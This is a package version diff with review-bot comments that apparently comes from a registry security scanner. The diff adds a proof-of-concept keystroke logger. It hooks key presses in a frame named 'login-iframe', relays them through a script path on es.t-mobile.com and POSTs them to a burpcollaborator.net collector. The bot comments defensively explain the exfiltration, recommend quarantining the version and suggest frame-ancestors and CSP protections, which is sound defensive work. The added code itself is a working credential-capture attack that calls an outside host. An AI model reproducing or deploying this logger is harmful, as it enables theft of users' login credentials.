m0m0x01d 20.0.0 → 21.0.0
- package/iframe4.svg.html +1 -1
- package/intermediary.svg.js +11 -0
- package/keystroke-capture.svg.js +25 -0
- package/package.json +1 -1
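--- a/package/iframe4.svg.html
+++ b/package/iframe4.svg.html
@@ -5,7 +5,7 @@
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>Keystroke Capture</title>
-<script src="https://
+<script src="https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/keystroke-capture.js"></script>
 </head>
 <body>
 <h1>Keystroke Logger PoC</h1>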
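Review bot: The changed `<script src>` on new line 8 loads executable code from a version-pinned package path that appears to be relayed through a path on `es.t-mobile.com`, with no `integrity` attribute, in a page titled "Keystroke Capture". The old side of that line is truncated on this page, so exactly what changed in the URL cannot be confirmed from here. For triage, treat this version as one that pulls remote script at load time rather than shipping static markup. If that host really does relay registry content under its own origin, the relay should not serve it as executable same-origin content, and the site's `Content-Security-Policy` should not admit that path as a script source.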
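--- a/package/intermediary.svg.js
+++ b/package/intermediary.svg.js
@@ -0,0 +1,11 @@
+// Intermediary script to forward keystrokes to your server
+self.addEventListener('message', function(event) {
+var data = event.data;
+
+// Forward the keystrokes to your server
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
+xhr.setRequestHeader("Content-Type", "application/json");
+xhr.send(JSON.stringify({ keystrokes: data }));
+});
+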
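Review bot: The new `message` handler posts whatever it receives to a hard-coded host under `burpcollaborator.net` (new line 7), which is an out-of-band interaction collector and not anything belonging to the package, so the file's only function is to move data off the page. Nothing in the section limits what is forwarded or explains why a published package needs that endpoint. Registry scanning and egress monitoring can key on that domain suffix together with the `keystrokes` field name in the JSON body. This version should be quarantined rather than installed.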
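--- a/package/keystroke-capture.svg.js
+++ b/package/keystroke-capture.svg.js
@@ -0,0 +1,25 @@
+// Function to send keystrokes to the intermediary file on unpkg
+function sendKeystrokes(data) {
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/intermediary.svg.js", true);
+xhr.setRequestHeader("Content-Type", "application/json");
+xhr.send(JSON.stringify({ keystrokes: data }));
+}
+
+// Function to capture keystrokes in the iframe
+function captureKeystrokes() {
+var iframe = document.getElementById('login-iframe').contentWindow;
+
+// Listen for key presses in the iframe
+iframe.document.onkeyup = function(event) {
+sendKeystrokes(event.key); // Send each keystroke to the intermediary
+};
+}
+
+// Wait for the iframe to load, then start capturing keystrokes
+window.onload = function() {
+var iframe = document.getElementById('login-iframe');
+iframe.onload = function() {
+captureKeystrokes();
+};
+};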
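Review bot: `captureKeystrokes` (new lines 10–17) sets `onkeyup` on the document of the frame with id `login-iframe` and passes every `event.key` to `sendKeystrokes`, which posts it off-page, so this file is a keystroke logger aimed at a framed login form. Reading `contentWindow.document` is only permitted when the framing page and the framed page share an origin, so the practical defence sits with the login page. It should send `Content-Security-Policy: frame-ancestors 'none'` (or `X-Frame-Options: DENY`), and third-party files should not be served from the same origin as authentication pages. Dependency inventories should flag any install of this package version.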